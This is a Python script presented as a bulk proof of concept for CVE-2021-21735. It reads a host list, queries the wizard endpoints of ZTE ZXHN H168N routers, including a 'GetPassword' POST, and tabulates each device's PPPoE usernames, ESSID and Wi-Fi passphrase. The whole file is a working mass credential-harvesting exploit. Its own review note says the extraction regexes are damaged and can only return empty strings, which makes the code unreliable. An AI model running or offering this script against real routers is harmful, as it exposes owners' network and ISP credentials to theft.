"""Bulk proof-of-concept for CVE-2021-21735 (ZTE ZXHN H168N wizard pages).

Reads a newline-delimited host list, requests three wizard endpoints per
host, and prints the values extracted from the responses as a colored table.

Only run this against devices you own or are explicitly authorized to test.
"""

import argparse
import asyncio
import html
import re
from pathlib import Path

import aiohttp
from colorama import Fore, Style, init

DEFAULT_INPUT_PATH = Path("urls.txt")

# Form body sent with the POST request in extract_router_secrets().
PASSWORD_FORM = {
    "IF_ACTION": "GetPassword",
    "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
    "PASSTYPE": "PSK",
}

TABLE_TEMPLATE = "{:<3} | {:<34} | {:<30} | {:<30} | {:<30} | {:<25}"
HEADERS = ["#", "URL", "AD Username", "VD Username", "ESSID", "Wi-Fi Password"]

# NOTE(review): every pattern below has a lazy group with nothing after it
# that forces the group to grow, so group(1) can only ever be the empty
# string. It looks as if the surrounding delimiters were lost at some point;
# confirm against the upstream version before relying on the output.
AD_USERNAME_PATTERN = r"(.*?)"
VD_USERNAME_PATTERN = r"(.*?)"
ESSID_PATTERN = r"\s*ESSID\s*\s*\s*(.*?)\s*"
PASSWORD_PATTERN = r"KeyPassphrase\s*(.*?)"

# Table layout helpers derived from TABLE_TEMPLATE, used by _render_row().
_COLUMN_SEPARATOR = " | "
_CELL_FORMATS = TABLE_TEMPLATE.split(_COLUMN_SEPARATOR)
# One color prefix per column; the index column keeps the terminal default.
_COLUMN_COLORS = ("", Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA)

init()


def parse_args() -> argparse.Namespace:
    """Parse the command line.

    Returns:
        A namespace with ``input`` (Path to the host list) and ``timeout``
        (int, seconds).
    """
    parser = argparse.ArgumentParser(
        description="Bulk PoC for CVE-2021-21735 against ZTE ZXHN H168N wizard endpoints."
    )
    parser.add_argument(
        "-i",
        "--input",
        type=Path,
        default=DEFAULT_INPUT_PATH,
        help="Path to a newline-delimited host list.",
    )
    parser.add_argument(
        "--timeout",
        type=int,
        default=10,
        help="Per-host request timeout in seconds.",
    )
    return parser.parse_args()


def extract(pattern: str, text: str, default: str = "") -> str:
    """Return the first capture group of *pattern* found in *text*.

    The search uses ``re.DOTALL``. The captured text is stripped of
    surrounding whitespace and HTML entities are unescaped.

    Args:
        pattern: Regular expression containing at least one group.
        text: Text to search.
        default: Value returned when the pattern does not match.

    Returns:
        The cleaned capture, or *default* when there is no match.
    """
    match = re.search(pattern, text, re.DOTALL)
    if not match:
        return default
    return html.unescape(match.group(1).strip())


def load_hosts(input_path: Path) -> list[str]:
    """Read *input_path* as UTF-8 and return its non-blank lines, stripped."""
    lines = input_path.read_text(encoding="utf-8").splitlines()
    return [line.strip() for line in lines if line.strip()]


async def fetch_text(session: aiohttp.ClientSession, method: str, url: str, **kwargs) -> str:
    """Issue one request and return the response body as text.

    Extra keyword arguments are forwarded to ``session.request``.

    Raises:
        aiohttp.ClientResponseError: via ``raise_for_status()`` on an HTTP
            error status. Other errors raised by the request propagate
            unchanged.
    """
    async with session.request(method, url, **kwargs) as response:
        response.raise_for_status()
        return await response.text()


async def extract_router_secrets(session: aiohttp.ClientSession, host: str) -> dict[str, str]:
    """Query one host and build its result row.

    Three requests are made in sequence against ``http://{host}/wizard_page``.
    If any of them raises, the host is still reported, with blank fields.

    Args:
        session: Shared client session used for all requests.
        host: Host (and optional port) taken verbatim from the input file.

    Returns:
        A dict keyed by the column names in ``HEADERS[1:]``.
    """
    base_url = f"http://{host}/wizard_page"
    try:
        pppoe_xml = await fetch_text(session, "GET", f"{base_url}/wizard_pppoe_lua.lua")
        wlan_xml = await fetch_text(session, "GET", f"{base_url}/wizard_wlan_config_lua.lua")
        password_xml = await fetch_text(
            session,
            "POST",
            f"{base_url}/wizard_wlan_config_lua.lua",
            data=PASSWORD_FORM,
        )
    except Exception:
        # Deliberate best-effort: one failing host must not abort the run.
        return {
            "URL": host,
            "AD Username": "",
            "VD Username": "",
            "ESSID": "",
            "Wi-Fi Password": "",
        }

    return {
        "URL": host,
        "AD Username": extract(AD_USERNAME_PATTERN, pppoe_xml),
        "VD Username": extract(VD_USERNAME_PATTERN, pppoe_xml),
        "ESSID": extract(ESSID_PATTERN, wlan_xml),
        # The extracted value is capped at 64 characters.
        "Wi-Fi Password": extract(PASSWORD_PATTERN, password_xml)[:64],
    }


def _render_row(cells: list[str]) -> tuple[str, int]:
    """Format one table row; return the colored text and its visible width.

    Each cell is padded as plain text first and colored afterwards, so the
    color escape sequences (which occupy no space on screen) do not count
    towards the column widths or the reported width.
    """
    padded = [spec.format(cell) for spec, cell in zip(_CELL_FORMATS, cells)]
    visible_width = len(_COLUMN_SEPARATOR.join(padded))
    colored = _COLUMN_SEPARATOR.join(
        color + text for color, text in zip(_COLUMN_COLORS, padded)
    )
    return colored + Style.RESET_ALL, visible_width


def print_header() -> None:
    """Print the table header framed by two cyan separator lines."""
    header, width = _render_row(HEADERS)
    separator = Fore.CYAN + "-" * width + Style.RESET_ALL
    print(separator)
    print(header + "|")
    print(separator)


def print_row(index: int, row: dict[str, str]) -> None:
    """Print one result row followed by a cyan separator line.

    Args:
        index: Row number shown in the first column.
        row: Mapping containing every column name in ``HEADERS[1:]``.
    """
    cells = [str(index), *(row[name] for name in HEADERS[1:])]
    rendered, width = _render_row(cells)
    print(rendered + "|")
    print(Fore.CYAN + "-" * width + Style.RESET_ALL)


async def run_bulk_poc(input_path: Path, timeout_seconds: int) -> None:
    """Process every host in *input_path* and print rows as they complete.

    One task is created per host; rows are printed in completion order and
    rows identical in every column are printed only once.

    Args:
        input_path: Newline-delimited host list.
        timeout_seconds: Passed as ``aiohttp.ClientTimeout(total=...)`` for
            the shared session.
    """
    hosts = load_hosts(input_path)
    seen: set[tuple[str, str, str, str, str]] = set()
    results: list[dict[str, str]] = []

    print_header()

    timeout = aiohttp.ClientTimeout(total=timeout_seconds)
    async with aiohttp.ClientSession(timeout=timeout) as session:
        tasks = [asyncio.create_task(extract_router_secrets(session, host)) for host in hosts]
        for task in asyncio.as_completed(tasks):
            try:
                row = await task
            except Exception as error:
                print(f"{Fore.RED}Error: {error}{Style.RESET_ALL}")
                continue

            identity = (
                row["URL"],
                row["AD Username"],
                row["VD Username"],
                row["ESSID"],
                row["Wi-Fi Password"],
            )
            if identity in seen:
                continue

            seen.add(identity)
            results.append(row)
            # The printed index is the count of unique rows so far.
            print_row(len(results), row)


def main() -> None:
    """Entry point: parse arguments and run the bulk check."""
    args = parse_args()
    asyncio.run(run_bulk_poc(args.input, args.timeout))


if __name__ == "__main__":
    main()